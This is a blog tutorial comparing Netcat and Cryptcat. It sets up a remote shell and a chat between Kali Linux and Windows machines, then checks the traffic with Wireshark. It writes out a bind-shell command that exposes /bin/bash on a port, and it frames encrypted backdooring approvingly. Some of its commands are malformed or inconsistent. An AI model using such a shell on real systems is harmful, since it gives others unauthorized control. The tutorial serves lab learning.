Saturday, May 25, 2024

Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine

Netcat is a good build network debugging tool, which can read and write data across computers using TCP or UDP, it is also called TCP/IP utilities.

It is capable to act as a master and slave to do file transfer, TCP banner grabbing, backdoor shells, port scanners, port redirection, and network chats can also be performed using Netcat.

In this Kali Linux Tutorial how to work with Netcat and Cryptcat would show the difference between them.

Remote shell with Netcat:-

  • Execute Command: nc -l -p 1338 -e /bin/bash
  • The above listener will be listening via port 1338 and gives executable -e  for anyone for shell access through /bin/bash
  • Now, Kali Linux is a backdoor to your network.
  • Execute Command on Windows Machine :nc.exe <Kali linux Ip> <listening port >
  • The above-illustrated image shows the Windows machine or any client accessing and controlling Kali machine via Linux commands.

Chatroom:-

  • Execute Command in Kali Linux: nc -l -p 1337.
  • Above command, TCP session will be established to receive packets from any IP which connects to port 1337 & now your own private messenger is ready.
  • Execute Command in Windows machine: nc.exe <listener Ip address or Kali linux Ip>
  • The above image illustrates the listener over the 443 port & chat begins !!!
  • Here both the client and server are started chatting using Netcat. For More Functions & Commands Refer Here

Also Read Commix – Automated All-in-One OS Command Injection and Exploitation Tool

Note: Conversations between Kali Linux and Windows machines are encrypted or not ???? Let us check with Wireshark! 

Wireshark(packet capture Tool):-

  • OOPS !!!! Follow TCP Stream in Wireshark captures connections & clear text messages.OMG!
  • Anyone in your network can use Wireshark to see these activities.
  • But Still, we have an idea to overcome this issue. Let’s use ciphers!

Cryptcat(encrypting netcat):-

  • Cryptcat has an advanced feature like using ciphers to encrypt clear text communication.
  • Cryptcat uses end-to-end encryption using a Two-Fish encryption algorithm
  • Above comment executed : cryptcat -<lisener> <port> 8000
  • Cryptcat Commands will be the same as Netcat
  • Performed backdooring using Cryptcat, let’s check out the below Image of a chat session using Cryptcat.
  • So, we can see that the crypt cat encrypts the connection. It’s the most secure way of backdooring. Netcat is acquired by Nmap project and named as Ncat which supports SSL over Traffic. Cats are always Different. Happy Hacking !!!
Website

Latest articles

Hackers Weaponizing Microsoft Access Documents To Execute Malicious Program

In multiple aggressive phishing attempts, the financially motivated organization UAC-0006 heavily targeted Ukraine, utilizing...

Microsoft Warns Of Storm-0539’s Aggressive Gift Card Theft

Gift cards are attractive to hackers since they provide quick monetization for stolen data...

Kinsing Malware Attacking Apache Tomcat Server With Vulnerabilities

The scalability and flexibility of cloud platforms recently boosted the emerging trend of cryptomining...

NSA Releases Guidance On Zero Trust Maturity To Secure Application From Attackers

Zero Trust Maturity measures the extent to which an organization has adopted and implemented...

Chinese Hackers Stay Hidden On Military And Government Networks For Six Years

Hackers target military and government networks for varied reasons, primarily related to spying, which...

DNSBomb : A New DoS Attack That Exploits DNS Queries

A new practical and powerful Denial of service attack has been discovered that exploits...

Malicious PyPI & NPM Packages Attacking MacOS Users

Cybersecurity researchers have identified a series of malicious software packages targeting MacOS users.These...

Free Webinar

Live API Attack Simulation

94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise.
Key takeaways include:

  • An exploit of OWASP API Top 10 vulnerability
  • A brute force ATO (Account Takeover) attack on API
  • A DDoS attack on an API
  • Positive security model automation to prevent API attacks

Related Articles